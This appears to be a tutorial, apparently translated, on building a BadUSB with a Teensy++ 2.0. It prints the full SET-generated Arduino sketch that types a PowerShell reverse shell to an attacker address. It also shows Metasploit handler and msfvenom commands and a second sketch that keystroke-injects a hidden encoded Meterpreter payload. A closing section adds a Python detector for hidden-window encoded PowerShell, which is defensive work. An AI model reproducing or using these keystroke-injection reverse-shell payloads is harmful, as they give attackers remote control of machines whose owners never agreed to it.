For how to build a BadUSB, see: Building a simple shutdown BadUSB with a Teensy++ 2.0
Start Setoolkit:
setoolkit
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.5
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Return back to the main menu.
Enter 1 to select Social-Engineering Attacks.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
Enter 6 to select the Arduino-Based Attack Vector.
Select a payload to create the pde file to import into Arduino:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell based Reverse Shell Payload
4) Internet Explorer/FireFox Beef Jack Payload
5) Go to malicious java site and accept applet Payload
6) Gnome wget Download Payload
7) Binary 2 Teensy Attack (Deploy MSF payloads)
8) SDCard 2 Teensy Attack (Deploy Any EXE)
9) SDCard 2 Teensy Attack (Deploy on OSX)
10) X10 Arduino Sniffer PDE and Libraries
11) X10 Arduino Jammer PDE and Libraries
12) Powershell Direct ShellCode Teensy Attack
13) Peensy Multi Attack Dip Switch + SDCard Attack
14) HID Msbuild compile to memory Shellcode Attack
99) Return to Main Menu
Enter 3 to generate the PowerShell-based reverse_tcp attack vector.
[*] INO file created. You can get it under '/root/.set/reportsteensy_2018-03-24 09:24:27.876891.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.
Because this is a virtual machine, the program wrote the code straight to the ~/.set/reports directory.
┌─[root@parrot]─[~/.set/reports]
└──╼ #ls
'teensy_2018-03-24 09:24:27.876891.ino'
┌─[root@parrot]─[~/.set/reports]
└──╼ #
View the contents: cat teensy_2018-03-24\ 09\:24\:27.876891.ino
//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 [email protected]
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//
#define ascii_println Keyboard.println
void setup() {
delay(10000);
omg("powershell");
delay(1000);
// Here is the payload...
// This is a reverse bind shell through powershell. I need to fix it use the
// bind shell. The reverse bind shell code is cleaner though.
// I bet we could use the dip switches to configure the IP addy or port...
ascii_println("function cleanup {");
ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
ascii_println("exit}");
// Setup 192.168.1.1 HERE
ascii_println("$address = '192.168.1.1'");
// Setup PORT HERE
ascii_println("$port = '4444'");
ascii_println("$client = New-Object system.net.sockets.tcpclient");
ascii_println("$client.connect($address,$port)");
ascii_println("$stream = $client.GetStream()");
ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
ascii_println("$process = New-Object System.Diagnostics.Process");
ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
ascii_println("$process.StartInfo.RedirectStandardInput = 1");
ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
ascii_println("$process.StartInfo.UseShellExecute = 0");
ascii_println("$process.Start()");
ascii_println("$inputstream = $process.StandardInput");
ascii_println("$outputstream = $process.StandardOutput");
ascii_println("Start-Sleep 1");
ascii_println("$encoding = new-object System.Text.AsciiEncoding");
ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
ascii_println("$out = $null; $done = $false; $testing = 0;");
ascii_println("while (-not $done) {");
ascii_println("if ($client.Connected -ne $true) {cleanup}");
ascii_println("$pos = 0; $i = 1");
ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
ascii_println("if ($pos -gt 0) {");
ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
ascii_println("$inputstream.write($string)");
ascii_println("start-sleep 1");
ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
ascii_println("else {");
ascii_println("$out = $encoding.GetString($outputstream.Read())");
ascii_println("while($outputstream.Peek() -ne -1){");
ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
ascii_println("$out = $null");
ascii_println("$string = $null}} else {cleanup}}");
ascii_println(""); //Enter to start execution
}
void loop() {
}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_println(SomeCommand);
}
The connect-back address is set in the line ascii_println("$address = '192.168.1.1'");
After changing it, load the code into Arduino and flash it onto the Teensy++ 2.0.
Start an msf handler in Parrot to listen:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.59.128
LHOST => 192.168.59.128
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.59.128:4444
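Plug the Teensy++ 2.0 into the computer.
PowerShell opens automatically and the attack vector is typed in.
The listener on the right receives the shell.
This is an ordinary reverse_tcp cmd shell. To get a Meterpreter shell instead, choose option 1, Powershell HTTP GET MSF Payload, in the menu above.
That option requires hosting the trojan on your own server and running an HTTP server so the target machine can download and execute it.
Here a different method is used to get the Meterpreter shell.
First, generate the cmd command that yields the Meterpreter shell: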
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4455 -f psh-cmd
The generated payload:
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64-encoded payload omitted>
Then modify the code from the earlier simple-shutdown build, replacing the shutdown command it typed with the payload above:
#include "Keyboard.h"
/* Init function */
void setup()
{
// Beginning the Keyboard stream
Keyboard.begin();
// Wait 500ms
delay(500);
delay(3000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
Keyboard.print("cmd");
delay(1000);
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print("%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64-encoded payload omitted>");
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);
delay(700);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
// Ending stream
Keyboard.end();
}
/* Unused endless loop */
void loop() {}
Start the listener:
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.59.128:4455
Flash again.
Once flashing completes, cmd pops up, the attack code is typed in, and the shell is received.
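Seen from the defending side, the command line typed by the second sketch leaves a recognisable shape in process-creation logs: powershell.exe started with a hidden window and an encoded command. The following is an added example, not part of the original post and not code from SET or Metasploit; the event fields (host, command_line) and the sample events are constructed assumptions, and the encoded script in them is harmless.

```python
import base64
import binascii

def _flag_is(token, full_name, min_len, aliases=()):
    """True if token abbreviates full_name the way powershell.exe accepts."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full_name.startswith(name))

def decode_encoded_command(blob):
    """-EncodedCommand is base64 over UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def inspect_command_line(command_line):
    """Return (findings, decoded_script) for one process-creation command line."""
    tokens = command_line.split()
    findings, decoded = [], None
    if "powershell" not in command_line.lower():
        return findings, decoded
    for tok, nxt in zip(tokens, tokens[1:] + [""]):
        if _flag_is(tok, "noprofile", 3):
            findings.append("no-profile")
        elif _flag_is(tok, "windowstyle", 1) and nxt.lower() == "hidden":
            findings.append("hidden-window")
        elif _flag_is(tok, "encodedcommand", 1, aliases=("ec",)):
            findings.append("encoded-command")
            decoded = decode_encoded_command(nxt)  # plaintext for the analyst
    return findings, decoded

def triage(events):
    """Alert when a hidden window and an encoded command appear together."""
    alerts = []
    for ev in events:
        findings, decoded = inspect_command_line(ev["command_line"])
        if {"hidden-window", "encoded-command"} <= set(findings):
            alerts.append({"host": ev["host"], "findings": findings, "decoded": decoded})
    return alerts

# Constructed sample events (not real telemetry); the encoded script is harmless.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
EVENTS = [
    {"host": "ws-01", "command_line": "cmd.exe /b /c start /b /min powershell.exe "
                                      f"-nop -w hidden -e {SAMPLE_B64}"},
    {"host": "ws-02", "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "ws-03", "command_line": r"notepad.exe C:\notes.txt"},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

Matching on parameter prefixes rather than the literal string "-nop -w hidden -e" keeps the rule from being sidestepped by spelling the same flags out in full.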